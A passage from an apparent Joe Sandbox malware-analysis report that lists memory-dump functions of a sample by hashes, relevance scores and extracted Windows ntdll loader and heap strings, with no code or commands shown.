                Function 014C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 14c2c0a-14c2c0f 1 14c2c1f-14c2c26 LdrInitializeThunk 0->1 2 14c2c11-14c2c18 0->2
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 73fa2b8c7226a713ae45791338d3eeeb127b7eec6c9ff5f85abc6635c401f1ca
                • Instruction ID: 6df74007a3f7910c7485a222588b7f08c5d05d8e090af3492b803ccc462d6708
                • Opcode Fuzzy Hash: 73fa2b8c7226a713ae45791338d3eeeb127b7eec6c9ff5f85abc6635c401f1ca
                • Instruction Fuzzy Hash: 62B09B759015D5C5DE51E7644608B17791077D0701F15C067D3030653F4778C1D1E276
                Function 0041F0D0 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.2549320260.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_41f000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7e0fa14252d61827cacaed210b281034bc2fadd4f7a3aae0c4df709769b83de6
                • Instruction ID: bf268d91f619938eb03b39c7895fca664e884f2412e91478f794490b2a2455dc
                • Opcode Fuzzy Hash: 7e0fa14252d61827cacaed210b281034bc2fadd4f7a3aae0c4df709769b83de6
                • Instruction Fuzzy Hash: 71A022A8C0830C03002030FA2A03023B38CC000008F0003EAAE8C022023C02AC3200EB

                Non-executed Functions

                Function 01502349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2160512332
                • Opcode ID: ec517b12424dfd6416f58e7fdb69e729fc0e067d485b68b138429bdf14ce86df
                • Instruction ID: d4105c68ae8335f5d2525456a45119bf55e1e33fd2266e919186bf13bf160270
                • Opcode Fuzzy Hash: ec517b12424dfd6416f58e7fdb69e729fc0e067d485b68b138429bdf14ce86df
                • Instruction Fuzzy Hash: E792A171604742AFE722CF59C885F6BB7E8BB94754F04481EFA94DB2A0D770E844CB92
                Function 01530274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                • API String ID: 3446177414-1700792311
                • Opcode ID: 725e609344f987fdad58c8ba33c225ed40ed967d6dbb589e89f01cfed109b1c7
                • Instruction ID: c3b626d654c04ea27e9a857a0dd5f3d532ae1ef79f9979344e1f34c4957396f7
                • Opcode Fuzzy Hash: 725e609344f987fdad58c8ba33c225ed40ed967d6dbb589e89f01cfed109b1c7
                • Instruction Fuzzy Hash: 95D1EC31600386DFDB22DFA9D841AAEBBF1FF99710F19804AF8559F2A2C7349941DB10
                Function 014B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                • API String ID: 0-792281065
                • Opcode ID: 1bbd63bc5f5a1b78b06471fe9303499337fd69d1cd68f201a72834a63538eec4
                • Instruction ID: 0aca363faf199e33a1e8099ab27f2dfb6e27661ecd00c9613e2075da668d0412
                • Opcode Fuzzy Hash: 1bbd63bc5f5a1b78b06471fe9303499337fd69d1cd68f201a72834a63538eec4
                • Instruction Fuzzy Hash: 55917C70B007129BEB25DF19E885BAB7BA5BB50B24F1A003FD6106F3B1DBB44801D7A1
                Function 0148A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: 19b724725796e78a267e6359b32c2b855460c067cd9e0017ddc0232e57002e9c
                • Instruction ID: e286401a655e5a8b8690e6688572b040d1f33a2d478e2286d098ae30a42f2245
                • Opcode Fuzzy Hash: 19b724725796e78a267e6359b32c2b855460c067cd9e0017ddc0232e57002e9c
                • Instruction Fuzzy Hash: 99C188745083828FDB11EF58C144B6EB7E4BF84704F10496BF9959B361E7B8CA4ACB62
                Function 0147A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: 5b1d070e21b0b8392cd52438122cc6d34069a1f0ae10f822bedff868eabb73b6
                • Instruction ID: 39a49e98a1b530829a4a45c7b04775bfd41e5bb2c4f6982c78ebeb3a1f7cf1c9
                • Opcode Fuzzy Hash: 5b1d070e21b0b8392cd52438122cc6d34069a1f0ae10f822bedff868eabb73b6
                • Instruction Fuzzy Hash: 2DA18D759012299BDF31DF68CC98BEAB7B8EF54710F1101EAE908A7260DB359E85CF50
                Function 0153C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                Download Yara Rule
                Strings
                • @, xrefs: 0153C1F1
                • PreferredUILanguages, xrefs: 0153C212
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0153C1C5
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                • API String ID: 0-2968386058
                • Opcode ID: 7215f5b8a098e5d527fcbdb4808c21586cd50ac9176eda598239d21d515f2f55
                • Instruction ID: 86f3e99dbfc08f06a3baac288135838a37f3df0d5e557b36e6c6c030917c532e
                • Opcode Fuzzy Hash: 7215f5b8a098e5d527fcbdb4808c21586cd50ac9176eda598239d21d515f2f55
                • Instruction Fuzzy Hash: F2416472E00219ABDF11DED9C841FEEBBB8BBA4700F14406BFA49BB250D7749A448B50
                Function 01514144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                • API String ID: 0-1373925480
                • Opcode ID: 7aab548a2a71cb42b4fe1e6fb34d12ed5c3bdc38feef35f0522f7181702f8eba
                • Instruction ID: a8ff2ed99a986b94d5ce980458d6b9ca94cedfc41009b7c0d926fd61256645ad
                • Opcode Fuzzy Hash: 7aab548a2a71cb42b4fe1e6fb34d12ed5c3bdc38feef35f0522f7181702f8eba
                • Instruction Fuzzy Hash: AD410032A006598BFB22DBE9C840BADBBB8FF65340F24085ED911EF795D7348942CB51
                Function 015020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                Download Yara Rule
                Strings
                • LdrpInitializationFailure, xrefs: 015020FA
                • minkernel\ntdll\ldrinit.c, xrefs: 01502104
                • Process initialization failed with status 0x%08lx, xrefs: 015020F3
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2986994758
                • Opcode ID: fb9d672a14eb144f01bef7cb666b34f63149cd70a68891951269e26588996b71
                • Instruction ID: 1092e935ceb1d7fe4ef7a802d4b0374efb8626ec7ae9a5070fa06e72aa00e7b6
                • Opcode Fuzzy Hash: fb9d672a14eb144f01bef7cb666b34f63149cd70a68891951269e26588996b71
                • Instruction Fuzzy Hash: 22F0F434640208BBE724E64D9C07F99776CFB80A58F15001EF6007B2D1D2F0A904DA82
                Function 014903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: #%u
                • API String ID: 48624451-232158463
                • Opcode ID: c4116257dc0d05094888f93d116562cca98ae845acddc820b869c3856421bf7e
                • Instruction ID: be15baa44c6c158de2f5b4150470abe3553588f1bc63151b9d5764c32c54f042
                • Opcode Fuzzy Hash: c4116257dc0d05094888f93d116562cca98ae845acddc820b869c3856421bf7e
                • Instruction Fuzzy Hash: B2714E71A0014A9FDF01DFA9C994FAEBBF8BF58744F15406AE905EB261E634ED01CB60
                Function 0154A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction ID: 7f484990d05178795cabd4d5da56c3dcdefebfd110821b1153c46f856bfc05a3
                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction Fuzzy Hash: D7C1EE312443429BEB65CF28C841B6BBBE5BFD4318F084A2DF6968F291D7B4D505CB91
                Function 015243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$MUI
                • API String ID: 0-17815947
                • Opcode ID: 644b08ac520b1e6a2d4669fdfa345d63c2c2549fe90c87b8c1ffdb697bd1cee3
                • Instruction ID: 12831d0eed4ebc79940006ee9fe82f419a7a921668a805bc21fa529680cacbbf
                • Opcode Fuzzy Hash: 644b08ac520b1e6a2d4669fdfa345d63c2c2549fe90c87b8c1ffdb697bd1cee3
                • Instruction Fuzzy Hash: 3E510A72E0061DAFDF11DFA9CC90EEEBBB8FB55754F10052AE511BB290D6709A05CBA0
                Function 0148A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                Download Yara Rule
                Strings
                • RtlpResUltimateFallbackInfo Enter, xrefs: 0148A2FB
                • RtlpResUltimateFallbackInfo Exit, xrefs: 0148A309
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: 0ce7ca3a5a919fe8d22670cd7415b275eaf566705b4bf7a441742c8ef7771996
                • Instruction ID: d1f4ef5f629003b7b8c484d9b4124e5d84f595686fff46f1b33d2e7b6e31f619
                • Opcode Fuzzy Hash: 0ce7ca3a5a919fe8d22670cd7415b275eaf566705b4bf7a441742c8ef7771996
                • Instruction Fuzzy Hash: A3418A30A04659DFEB22DF69C844B6E7BB8BF85700F2440ABE904DB3B1E2B5D941CB50
                Function 0152A118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: 536535da87f905c8d6cb197bdacdde7a518a90bc64c65f5fbf0cdef32063732f
                • Instruction ID: 80ba795657eb7b39d2429292541f3104a1b1d8eabac4727520492051f4d85ebc
                • Opcode Fuzzy Hash: 536535da87f905c8d6cb197bdacdde7a518a90bc64c65f5fbf0cdef32063732f
                • Instruction Fuzzy Hash: 4C22B1726046718BEB25CF2DC09437ABBF1BF46300F188859D9968FAC6E335E452DB64
                Function 0152E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: c8c844d7b1ca3a2269df9aa45b208de52c69731c1ea994a56da81b325d526690
                • Instruction ID: 25826743e3b6cfe8c1d4a2ed185e5ab071aca9ce2d236aa48ef07e6405bdbd75
                • Opcode Fuzzy Hash: c8c844d7b1ca3a2269df9aa45b208de52c69731c1ea994a56da81b325d526690
                • Instruction Fuzzy Hash: 48918032900555AEDF229FA5DC55FEFBBB9FF66740F10002AF505AB2A0D774A901CB60
                Function 01522000 Relevance: .8, Instructions: 757COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c7d44a7add2c3f51cd5eb0b3c1aba7b21c2caa779297fff3505dbcad019d030
                • Instruction ID: d3fecdd3bb687890b21da7a6c551d61dd12d28eb28e926d0add1ef4b6429fd25
                • Opcode Fuzzy Hash: 1c7d44a7add2c3f51cd5eb0b3c1aba7b21c2caa779297fff3505dbcad019d030
                • Instruction Fuzzy Hash: EA42E53B6083518BD725CF69C880A6FBBE5BF96300F08492DFA868F290D771D945CB52
                Function 01518158 Relevance: .6, Instructions: 617COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5325a69fa79a40b1af3376e12bcedebd67ccf6e649eebf19ce97a97f3a1a6149
                • Instruction ID: 4e06eb094378ee854764d71f3edba098829c3e34dc3152e4115c1287f71eed4b
                • Opcode Fuzzy Hash: 5325a69fa79a40b1af3376e12bcedebd67ccf6e649eebf19ce97a97f3a1a6149
                • Instruction Fuzzy Hash: 8B428E75E002198FEB25CF69C881BADBBF5BF58300F19809AE948EB255D7349D81CF50
                Function 01478397 Relevance: .4, Instructions: 380COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b225339399ce6e762f7793e593a577b3aff25a8cadd09f67c7a8945ad3dac804
                • Instruction ID: 4afb9e368fc0f4ced682dbc5e1fb52c26f411b5ae1f9db185bfbd59820982aef
                • Opcode Fuzzy Hash: b225339399ce6e762f7793e593a577b3aff25a8cadd09f67c7a8945ad3dac804
                • Instruction Fuzzy Hash: 32D1BE71A002079BDF14DF69C894AFEB7A5FF65204F05862FEA169B2A0E730D951CB60
                Function 01508243 Relevance: .3, Instructions: 322COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction ID: 3b48621c94f3d16a3af225565f41367c60bae1224f84cd5bea1f914a1d3c62f6
                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction Fuzzy Hash: 0CB13274E00A06AFDF26DBD9C940EAFBBB9BF84304F14445DAA429B7D1DA34E945CB10
                Function 014883C0 Relevance: .3, Instructions: 281COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc59c5f106957ceeed644e8486f3c2cab98850f290f465aec2179313db3f4d00
                • Instruction ID: 17175f04a687f2c04af29fc7bfe2bb2b645f2a4f14c728f16110a69a60105346
                • Opcode Fuzzy Hash: dc59c5f106957ceeed644e8486f3c2cab98850f290f465aec2179313db3f4d00
                • Instruction Fuzzy Hash: 81C17774108341CFE760DF19C494BABB7E5BF98704F44492EE989873A1E774E908CBA2
                Function 014C0185 Relevance: .3, Instructions: 276COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f056d9a14a6e422ef00e0043f2d54dafeef1a5f8b0a07d256f731d1314ad01b7
                • Instruction ID: 9c66bc05eff412df61da5af322b278b5281b58190b038d12bff84490a59cd1ba
                • Opcode Fuzzy Hash: f056d9a14a6e422ef00e0043f2d54dafeef1a5f8b0a07d256f731d1314ad01b7
                • Instruction Fuzzy Hash: F8A1C278A00616DBEB65DF69C590BABB7A1FF54718F00402FFA15973A2DB34E812CB50
                Function 015060E0 Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2b65fdbd0548e0aacc151842a6ec28b1b3b7984f03bc0c4adbae485cfdf4926a
                • Instruction ID: 15af2ade19ab4108e99a1800767b6bdf46044645dfa5300b292b5e8d97f0091e
                • Opcode Fuzzy Hash: 2b65fdbd0548e0aacc151842a6ec28b1b3b7984f03bc0c4adbae485cfdf4926a
                • Instruction Fuzzy Hash: 66919071D00216AFDF16CFA9D884BAEBFB5BF48710F154169E610AF291D734EA109BA0
                Function 0149E3F0 Relevance: .3, Instructions: 261COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
